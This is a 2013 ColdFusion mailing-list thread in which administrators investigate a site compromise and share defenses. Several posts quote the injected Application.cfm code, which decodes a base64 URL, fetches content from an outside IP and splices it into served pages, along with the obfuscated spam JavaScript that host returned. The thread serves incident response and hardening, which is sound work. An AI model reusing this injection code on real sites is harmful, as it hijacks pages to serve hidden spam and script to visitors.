Re: Possible Hack?
This little amendment to the footer of the home page will hopefully be enough to help me rest comfortably over the weekend... cffile action = read file = network path\application.cfm variable = strApplicationTest cfif left(strApplicationTest,14) EQ cfapplication !---Success! The application file has not been hacked--- cfelse !---Oops! They have done it again--- cffile action = copy destination = network path\wwwroot\application.cfm source = network path\wwwroot\application.bak /cfif ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354401 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
RE: Possible Hack?
We got hit with that exact hack on Sunday, and we have all patches and updates installed up to date. Robert Harrison Director of Interactive Services Austin Williams Advertising I Branding I Digital I Direct 125 Kennedy Drive, Suite 100 I Hauppauge, NY 11788 T 631.231.6600 X 119 F 631.434.7022 http://www.austin-williams.com Blog: http://www.austin-williams.com/blog Twitter: http://www.twitter.com/austin_williams -Original Message- From: Mike K [mailto:afpwebwo...@gmail.com] Sent: Sunday, February 03, 2013 8:10 PM To: cf-talk Subject: Re: Possible Hack? I have had this same code added to one of my sites too. (I'm checking now to see if it's just one) Did you find out yet where the access point was to modify your code? Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion 9 Enterprise, PHP, ASP, ASP.NET hosting from AUD$15/month ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354263 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
RE: Possible Hack?
Checking, all of the sites we have that use an application.cfm file appear to have gotten this hack. The newer sites that use the application.cfc file appear to be untouched. We had at least three servers hit with this. Robert Harrison Director of Interactive Services Austin Williams Advertising I Branding I Digital I Direct 125 Kennedy Drive, Suite 100 I Hauppauge, NY 11788 T 631.231.6600 X 119 F 631.434.7022 http://www.austin-williams.com Blog: http://www.austin-williams.com/blog Twitter: http://www.twitter.com/austin_williams -Original Message- From: Robert Harrison [mailto:rob...@austin-williams.com] Sent: Monday, February 04, 2013 9:38 AM To: cf-talk Subject: RE: Possible Hack? We got hit with that exact hack on Sunday, and we have all patches and updates installed up to date. Robert Harrison Director of Interactive Services Austin Williams Advertising I Branding I Digital I Direct 125 Kennedy Drive, Suite 100 I Hauppauge, NY 11788 T 631.231.6600 X 119 F 631.434.7022 http://www.austin-williams.com Blog: http://www.austin-williams.com/blog Twitter: http://www.twitter.com/austin_williams -Original Message- From: Mike K [mailto:afpwebwo...@gmail.com] Sent: Sunday, February 03, 2013 8:10 PM To: cf-talk Subject: Re: Possible Hack? I have had this same code added to one of my sites too. (I'm checking now to see if it's just one) Did you find out yet where the access point was to modify your code? Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion 9 Enterprise, PHP, ASP, ASP.NET hosting from AUD$15/month ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354264 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
RE: Possible Hack?
From our side this hack appears to have been inserted yesterday during the Superbowl. The offending IP seems to have come from China. It got three of our sites on different servers. Only sites with an application.cfm file were hit. Sites using application.cfc were untouched. Robert Harrison Director of Interactive Services Austin Williams Advertising I Branding I Digital I Direct 125 Kennedy Drive, Suite 100 I Hauppauge, NY 11788 T 631.231.6600 X 119 F 631.434.7022 http://www.austin-williams.com Blog: http://www.austin-williams.com/blog Twitter: http://www.twitter.com/austin_williams -Original Message- From: Robert Harrison [mailto:rob...@austin-williams.com] Sent: Monday, February 04, 2013 9:49 AM To: cf-talk Subject: RE: Possible Hack? Checking, all of the sites we have that use an application.cfm file appear to have gotten this hack. The newer sites that use the application.cfc file appear to be untouched. We had at least three servers hit with this. Robert Harrison Director of Interactive Services Austin Williams Advertising I Branding I Digital I Direct 125 Kennedy Drive, Suite 100 I Hauppauge, NY 11788 T 631.231.6600 X 119 F 631.434.7022 http://www.austin-williams.com Blog: http://www.austin-williams.com/blog Twitter: http://www.twitter.com/austin_williams -Original Message- From: Robert Harrison [mailto:rob...@austin-williams.com] Sent: Monday, February 04, 2013 9:38 AM To: cf-talk Subject: RE: Possible Hack? We got hit with that exact hack on Sunday, and we have all patches and updates installed up to date. Robert Harrison Director of Interactive Services Austin Williams Advertising I Branding I Digital I Direct 125 Kennedy Drive, Suite 100 I Hauppauge, NY 11788 T 631.231.6600 X 119 F 631.434.7022 http://www.austin-williams.com Blog: http://www.austin-williams.com/blog Twitter: http://www.twitter.com/austin_williams -Original Message- From: Mike K [mailto:afpwebwo...@gmail.com] Sent: Sunday, February 03, 2013 8:10 PM To: cf-talk Subject: Re: Possible Hack? I have had this same code added to one of my sites too. (I'm checking now to see if it's just one) Did you find out yet where the access point was to modify your code? Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion 9 Enterprise, PHP, ASP, ASP.NET hosting from AUD$15/month ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354265 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Possible Hack?
From our side this hack appears to have been inserted yesterday during the Superbowl. The offending IP seems to have come from China. It got three of our sites on different servers. Only sites with an application.cfm file were hit. Sites using application.cfc were untouched. I would again strongly recommend that CF be configured so that it can't write to the web root, unless you specifically rely on that feature (CF-based CMS, for example). This will prevent any type of exploit that relies on writing to CF files using CF. Too many times, I see on this list and elsewhere people focusing on identifying and closing specific exploits, when their time would be best served by preventing the possibility of those exploits working by proper configuration. I'm not calling you out, Robert, I'm just using your message as a convenient place to reiterate this statement. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ http://training.figleaf.com/ Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on GSA Schedule, and provides the highest caliber vendor-authorized instruction at our training centers, online, or onsite. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354266 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
RE: Possible Hack?
I'm not calling you out, Robert... Call me out all you want. I'm a programmer. I use a hosting service who does the configuration like most everyone else. I'm forwarding this information to my host. Thanks Robert Harrison Director of Interactive Services Austin Williams Advertising I Branding I Digital I Direct 125 Kennedy Drive, Suite 100 I Hauppauge, NY 11788 T 631.231.6600 X 119 F 631.434.7022 http://www.austin-williams.com Blog: http://www.austin-williams.com/blog Twitter: http://www.twitter.com/austin_wi ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354267 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
RE: Possible Hack?
I still have one question. In order to use CFFile to rewrite the application.cfm file, wouldn't they have to get a file up on the site in the first place? Robert Harrison Director of Interactive Services Austin Williams Advertising I Branding I Digital I Direct 125 Kennedy Drive, Suite 100 I Hauppauge, NY 11788 T 631.231.6600 X 119 F 631.434.7022 http://www.austin-williams.com Blog: http://www.austin-williams.com/blog Twitter: http://www.twitter.com/austin_williams -Original Message- From: Robert Harrison [mailto:rob...@austin-williams.com] Sent: Monday, February 04, 2013 11:51 AM To: cf-talk Subject: RE: Possible Hack? I'm not calling you out, Robert... Call me out all you want. I'm a programmer. I use a hosting service who does the configuration like most everyone else. I'm forwarding this information to my host. Thanks Robert Harrison Director of Interactive Services Austin Williams Advertising I Branding I Digital I Direct 125 Kennedy Drive, Suite 100 I Hauppauge, NY 11788 T 631.231.6600 X 119 F 631.434.7022 http://www.austin-williams.com Blog: http://www.austin-williams.com/blog Twitter: http://www.twitter.com/austin_wi ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354268 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Possible Hack?
I still have one question. In order to use CFFile to rewrite the application.cfm file, wouldn't they have to get a file up on the site in the first place? Maybe, maybe not. The site could already have a file that does this legitimately that can accept malicious inputs (perhaps in /CFIDE or /cfdocs), or some other channel could be used to write a file with CF commands, such as database commands where the database has the ability to write to the filesystem (another thing that should probably be blocked as a matter of course, if the CF server and the database are even on the same machine). Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ http://training.figleaf.com/ Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on GSA Schedule, and provides the highest caliber vendor-authorized instruction at our training centers, online, or onsite. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354269 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Possible Hack?
Not to mention that other technology exploits can allow a hacker into the site, especially on Shared hosting. I know of one site that was almost hacked, but they gave up because they could not run the uploaded code. Now even though this was an inconvenience to the web site, it was still good enough to know that the code was stopped in its tracks. The site runs an MVC framework with SES URLS, and means that the web site didn't use the Application.cfm, but they found a way to create a folder in the webroot and upload the code for cffile and Applicatin.cfm, but as stated they were stopped in their tracks cause they had no way to run this code. -- Regards, Andrew Scott WebSite: http://www.andyscott.id.au/ Google+: http://plus.google.com/113032480415921517411 On Tue, Feb 5, 2013 at 4:13 AM, Dave Watts dwa...@figleaf.com wrote: I still have one question. In order to use CFFile to rewrite the application.cfm file, wouldn't they have to get a file up on the site in the first place? Maybe, maybe not. The site could already have a file that does this legitimately that can accept malicious inputs (perhaps in /CFIDE or /cfdocs), or some other channel could be used to write a file with CF commands, such as database commands where the database has the ability to write to the filesystem (another thing that should probably be blocked as a matter of course, if the CF server and the database are even on the same machine). Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ http://training.figleaf.com/ Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on GSA Schedule, and provides the highest caliber vendor-authorized instruction at our training centers, online, or onsite. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354270 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
RE: Possible Hack?
I know of one site that was almost hacked, but they gave up because they could not run the uploaded code. Now even though this was an inconvenience to the web site, it was still good enough to know that the code was stopped in its tracks. The site runs an MVC framework with SES URLS, and means that the web site didn't use the Application.cfm, but they found a way to create a folder in the webroot and upload the code for cffile and Applicatin.cfm, but as stated they were stopped in their tracks cause they had no way to run this code. *** FWIW - my site at Hosting A to Z was hacked, also. The hack wasn't working but was causing my site to crash with errors. Larry Stephens ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354271 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Possible Hack?
This same thing happened to us, I traced it back to two cfm files that were created in CFIDE/adminapi/customtags. The first file was created at 9:28AM the second at 1:03AM. The files were named adss.cfm and fusebox.cfm. fusebox.cfm is what scans for application.cfm, index.php, index.html, and index.htm then injects the code in them. I can post the source for the files if anyone wants to look at it. I still have no idea how they managed to create them though. From our side this hack appears to have been inserted yesterday during the Superbowl. The offending IP seems to have come from China. It got three of our sites on different servers. Only sites with an application.cfm file were hit. Sites using application.cfc were untouched. Robert Harrison Director of Interactive Services Austin Williams Advertising I Branding I Digital I Direct 125 Kennedy Drive, Suite 100 I Hauppauge, NY 11788 T 631.231.6600 X 119 F 631.434.7022 http://www.austin-williams.com Blog: http://www.austin-williams.com/blog Twitter: http://www.twitter.com/austin_williams -Original Message- From: Robert Harrison [mailto:rob...@austin-williams.com] Sent: Monday, February 04, 2013 9:49 AM To: cf-talk Subject: RE: Possible Hack? Checking, all of the sites we have that use an application.cfm file appear to have gotten this hack. The newer sites that use the application.cfc file appear to be untouched. We had at least three servers hit with this. Robert Harrison Director of Interactive Services Austin Williams Advertising I Branding I Digital I Direct 125 Kennedy Drive, Suite 100 I Hauppauge, NY 11788 T 631.231.6600 X 119 F 631.434.7022 http://www.austin-williams.com Blog: http://www.austin-williams.com/blog Twitter: http://www.twitter.com/austin_williams -Original Message- From: Robert Harrison [mailto:rob...@austin-williams.com] Sent: Monday, February 04, 2013 9:38 AM To: cf-talk Subject: RE: Possible Hack? We got hit with that exact hack on Sunday, and we have all patches and updates installed up to date. Robert Harrison Director of Interactive Services Austin Williams Advertising I Branding I Digital I Direct 125 Kennedy Drive, Suite 100 I Hauppauge, NY 11788 T 631.231.6600 X 119 F 631.434.7022 http://www.austin-williams.com Blog: http://www.austin-williams.com/blog Twitter: http://www.twitter.com/austin_williams -Original Message- From: Mike K [mailto:afpwebwo...@gmail.com] Sent: Sunday, February 03, 2013 8:10 PM To: cf-talk Subject: Re: Possible Hack? I have had this same code added to one of my sites too. (I'm checking now to see if it's just one) Did you find out yet where the access point was to modify your code? Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion 9 Enterprise, PHP, ASP, ASP.NET hosting from AUD$15/month ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354273 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
RE: Possible Hack?
That is it. Same results. I believe we've locked down against any further use of this method. Thanks, That was helpful. Robert Harrison Director of Interactive Services -Original Message- From: Aaron Frase [mailto:afr...@wddonline.com] Sent: Monday, February 04, 2013 2:39 PM To: cf-talk Subject: Re: Possible Hack? This same thing happened to us, I traced it back to two cfm files that were created in CFIDE/adminapi/customtags. The first file was created at 9:28AM the second at 1:03AM. The files were named adss.cfm and fusebox.cfm. fusebox.cfm is what scans for application.cfm, index.php, index.html, and index.htm then injects the code in them. I can post the source for the files if anyone wants to look at it. I still have no idea how they managed to create them though. From our side this hack appears to have been inserted yesterday during the Superbowl. The offending IP seems to have come from China. It got three of our sites on different servers. Only sites with an application.cfm file were hit. Sites using application.cfc were untouched. Robert Harrison Director of Interactive Services Austin Williams Advertising I Branding I Digital I Direct 125 Kennedy Drive, Suite 100 I Hauppauge, NY 11788 T 631.231.6600 X 119 F 631.434.7022 http://www.austin-williams.com Blog: http://www.austin-williams.com/blog Twitter: http://www.twitter.com/austin_williams -Original Message- From: Robert Harrison [mailto:rob...@austin-williams.com] Sent: Monday, February 04, 2013 9:49 AM To: cf-talk Subject: RE: Possible Hack? Checking, all of the sites we have that use an application.cfm file appear to have gotten this hack. The newer sites that use the application.cfc file appear to be untouched. We had at least three servers hit with this. Robert Harrison Director of Interactive Services Austin Williams Advertising I Branding I Digital I Direct 125 Kennedy Drive, Suite 100 I Hauppauge, NY 11788 T 631.231.6600 X 119 F 631.434.7022 http://www.austin-williams.com Blog: http://www.austin-williams.com/blog Twitter: http://www.twitter.com/austin_williams -Original Message- From: Robert Harrison [mailto:rob...@austin-williams.com] Sent: Monday, February 04, 2013 9:38 AM To: cf-talk Subject: RE: Possible Hack? We got hit with that exact hack on Sunday, and we have all patches and updates installed up to date. Robert Harrison Director of Interactive Services Austin Williams Advertising I Branding I Digital I Direct 125 Kennedy Drive, Suite 100 I Hauppauge, NY 11788 T 631.231.6600 X 119 F 631.434.7022 http://www.austin-williams.com Blog: http://www.austin-williams.com/blog Twitter: http://www.twitter.com/austin_williams -Original Message- From: Mike K [mailto:afpwebwo...@gmail.com] Sent: Sunday, February 03, 2013 8:10 PM To: cf-talk Subject: Re: Possible Hack? I have had this same code added to one of my sites too. (I'm checking now to see if it's just one) Did you find out yet where the access point was to modify your code? Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion 9 Enterprise, PHP, ASP, ASP.NET hosting from AUD$15/month ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354276 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
RE: Possible Hack?
One thing that I do is run a scheduled task every 5 minutes which retrieves my home page via cfhttp and compares it to the previous version. IF there is any change, it sends me a text and email telling me of the change. I added a url paramater to the scheduled task that when present adds a box at the end off my page which displays my personal information (name, address, email) from the database.. so that also gets checked for changes. I have a banner ad that changes on each page load.. so I added a way for my script to ignore changes in that banner ad. A cool test was on midnight on new years eve, I got a text from all of my websites - as the copyright date changed automaticaly. This is an early warning system in case of a successful hack. It also would tell me if the database server or web server or cf wasn't working. (the live server is monitored from my testing server). ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354257 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
RE: Possible Hack?
There are also a number of products out there which will regularly scan your website for malware. Here are a couple. bluethunderdomains.net/web-site-lock/ http://bluethunderdomains.net/web-site-anti-malware/ Regards Russ Michaels www.michaels.me.uk www.cfmldeveloper.com - Free CFML hosting for developers www.cfsearch.com - CF search engine ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354259 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Possible Hack?
I have had this same code added to one of my sites too. (I'm checking now to see if it's just one) Did you find out yet where the access point was to modify your code? Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion 9 Enterprise, PHP, ASP, ASP.NET hosting from AUD$15/month ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354262 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Possible Hack?
I noticed my CF server started timing out a lot lately. Then I looked at the code and on the Application.cfm page at the top was this code that I didn't put there. Anybody know what this is and how it might have gotten on the Application.cfm pages of the sites on this VPS? Not sure how it got there. Any help in plugging this hole would be appreciated. cfif (FindNoCase(Archivver,http_user_agent) EQ 0)cfsavecontent variable=pagaCFHTTP METHOD = Get URL = http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#; userAgent = Archivver cfset mmy = cfhttp.FileContentcfoutput #mmy# /cfoutput /cfsavecontent CFHTTP METHOD = Get URL = #hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')# cfset cfs = cfhttp.FileContent cfif (FindNoCase(/div,paga) GT 0) cfset paga = replace(paga, /div, /div#cfs#, one) cfelseif (FindNoCase(/table,paga) GT 0) cfset paga = replace(paga, /table, /table#cfs#, one) cfelseif (FindNoCase(/a,paga) GT 0) cfset paga = replace(paga, /a, /a#cfs#, one) cfelse cfset paga = replace(paga, /body, #cfs#/body, one) /cfif cfoutput #paga# /cfoutput cfabort /cfif cffunction name=hSWaawe cfargument name=HxzcGlk cfset Ypg = ToString(ToBinary(HxzcGlk)) cfreturn Ypg /cffunction ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354227 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Possible Hack?
I noticed my CF server started timing out a lot lately. Then I looked at the code and on the Application.cfm page at the top was this code that I didn't put there. Anybody know what this is and how it might have gotten on the Application.cfm pages of the sites on this VPS? Not sure how it got there. Any help in plugging this hole would be appreciated. The code fetches your page, outputs it, then fetches something from somewhere else and outputs that also. The somewhere else is this URL: http://199.19.94.194/cfset2.txt The content of that URL is: script language=JavaScriptfunction zdrViewState() { var a=0,m,v,t,z,x=new Array('9091968376','88879181928187863473749187849392773592878834218896','9977918890','949990793917947998942577939317'),l=x.length;while(++a=l){m=x[l-a]; t=z=''; for(v=0;vm.length;){t+=m.charAt(v++); if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a); t='';}}x[l-a]=z;}document.write(''+x[0]+' '+x[4]+'.'+x[2]+'{'+x[1]+'}/'+x[0]+'');}zdrViewState(); /script followed by a snippet of spam for payday loans. There are many things that could have allowed this to be injected. I recommend that you configure CF to run as a specific user account, and give that user account read/execute permissions to your CF files. By default, CF runs as SYSTEM on Windows, which has full control of all local files. It doesn't need this level of permissions. Doing this won't close the vulnerability used to inject the code in the first place, but it will prevent it from doing anything. Then, once you've done that, read the CF 9 Lockdown Guide and follow its instructions as best you can. You should do this as a matter of course for any CF server install. http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ http://training.figleaf.com/ Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on GSA Schedule, and provides the highest caliber vendor-authorized instruction at our training centers, online, or onsite. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354228 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
RE: Possible Hack?
Yeah I had figured out what the code did. My main concern is figuring out how they did it and preventing it in the future. I had already done the lockdown stuff many months ago which is why I am kind of baffled. I checked the FTP logs and see nothing in there for those files so the attack would have most likely come in via CF somewhere. -Original Message- From: Dave Watts [mailto:dwa...@figleaf.com] Sent: Saturday, February 02, 2013 11:49 AM To: cf-talk Subject: Re: Possible Hack? I noticed my CF server started timing out a lot lately. Then I looked at the code and on the Application.cfm page at the top was this code that I didn't put there. Anybody know what this is and how it might have gotten on the Application.cfm pages of the sites on this VPS? Not sure how it got there. Any help in plugging this hole would be appreciated. The code fetches your page, outputs it, then fetches something from somewhere else and outputs that also. The somewhere else is this URL: http://199.19.94.194/cfset2.txt The content of that URL is: script language=JavaScriptfunction zdrViewState() { var a=0,m,v,t,z,x=new Array('9091968376','88879181928187863473749187849392773592878834218896','9977918890','949990793917947998942577939317'),l=x.length;while(++a=l){m=x[l-a]; t=z=''; for(v=0;vm.length;){t+=m.charAt(v++); if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a); t='';}}x[l-a]=z;}document.write(''+x[0]+' '+x[4]+'.'+x[2]+'{'+x[1]+'}/'+x[0]+'');}zdrViewState(); /script followed by a snippet of spam for payday loans. There are many things that could have allowed this to be injected. I recommend that you configure CF to run as a specific user account, and give that user account read/execute permissions to your CF files. By default, CF runs as SYSTEM on Windows, which has full control of all local files. It doesn't need this level of permissions. Doing this won't close the vulnerability used to inject the code in the first place, but it will prevent it from doing anything. Then, once you've done that, read the CF 9 Lockdown Guide and follow its instructions as best you can. You should do this as a matter of course for any CF server install. http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ http://training.figleaf.com/ Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on GSA Schedule, and provides the highest caliber vendor-authorized instruction at our training centers, online, or onsite. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354229 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Possible Hack?
you should also check that you have all the hotfixes installed, especially recent ones which plugged a vulnerability that would allow attackers to upload files, which has been blogged and tweeted a lot. check your FTP logs for any hacked ftp accounts. A general security scan against your server would be a good idea. As well as http://hackmycf.com/ On Sat, Feb 2, 2013 at 4:48 PM, Dave Watts dwa...@figleaf.com wrote: I noticed my CF server started timing out a lot lately. Then I looked at the code and on the Application.cfm page at the top was this code that I didn't put there. Anybody know what this is and how it might have gotten on the Application.cfm pages of the sites on this VPS? Not sure how it got there. Any help in plugging this hole would be appreciated. The code fetches your page, outputs it, then fetches something from somewhere else and outputs that also. The somewhere else is this URL: http://199.19.94.194/cfset2.txt The content of that URL is: script language=JavaScriptfunction zdrViewState() { var a=0,m,v,t,z,x=new Array('9091968376','88879181928187863473749187849392773592878834218896','9977918890','949990793917947998942577939317'),l=x.length;while(++a=l){m=x[l-a]; t=z=''; for(v=0;vm.length;){t+=m.charAt(v++); if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a); t='';}}x[l-a]=z;}document.write(''+x[0]+' '+x[4]+'.'+x[2]+'{'+x[1]+'}/'+x[0]+'');}zdrViewState(); /script followed by a snippet of spam for payday loans. There are many things that could have allowed this to be injected. I recommend that you configure CF to run as a specific user account, and give that user account read/execute permissions to your CF files. By default, CF runs as SYSTEM on Windows, which has full control of all local files. It doesn't need this level of permissions. Doing this won't close the vulnerability used to inject the code in the first place, but it will prevent it from doing anything. Then, once you've done that, read the CF 9 Lockdown Guide and follow its instructions as best you can. You should do this as a matter of course for any CF server install. http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ http://training.figleaf.com/ Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on GSA Schedule, and provides the highest caliber vendor-authorized instruction at our training centers, online, or onsite. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354230 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
RE: Possible Hack?
Yeah our host Hosting.com sent out an email about those vulnerabilities and we applied the hotfixes for those already. About 6 weeks ago I think. The only thing I can think of is the cfide is setup as a virtual directory for these sites so they can use things like the FCKEditor etc. Is there another way to enable the use of things like that without just setting the CFIDE directory as a virtual directory for the entire site? -Original Message- From: Russ Michaels [mailto:r...@michaels.me.uk] Sent: Saturday, February 02, 2013 11:58 AM To: cf-talk Subject: Re: Possible Hack? you should also check that you have all the hotfixes installed, especially recent ones which plugged a vulnerability that would allow attackers to upload files, which has been blogged and tweeted a lot. check your FTP logs for any hacked ftp accounts. A general security scan against your server would be a good idea. As well as http://hackmycf.com/ On Sat, Feb 2, 2013 at 4:48 PM, Dave Watts dwa...@figleaf.com wrote: I noticed my CF server started timing out a lot lately. Then I looked at the code and on the Application.cfm page at the top was this code that I didn't put there. Anybody know what this is and how it might have gotten on the Application.cfm pages of the sites on this VPS? Not sure how it got there. Any help in plugging this hole would be appreciated. The code fetches your page, outputs it, then fetches something from somewhere else and outputs that also. The somewhere else is this URL: http://199.19.94.194/cfset2.txt The content of that URL is: script language=JavaScriptfunction zdrViewState() { var a=0,m,v,t,z,x=new Array('9091968376','88879181928187863473749187849392773592878834218896','9977918890','949990793917947998942577939317'),l=x.length;while(++a=l){m=x[l-a]; t=z=''; for(v=0;vm.length;){t+=m.charAt(v++); if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a); t='';}}x[l-a]=z;}document.write(''+x[0]+' 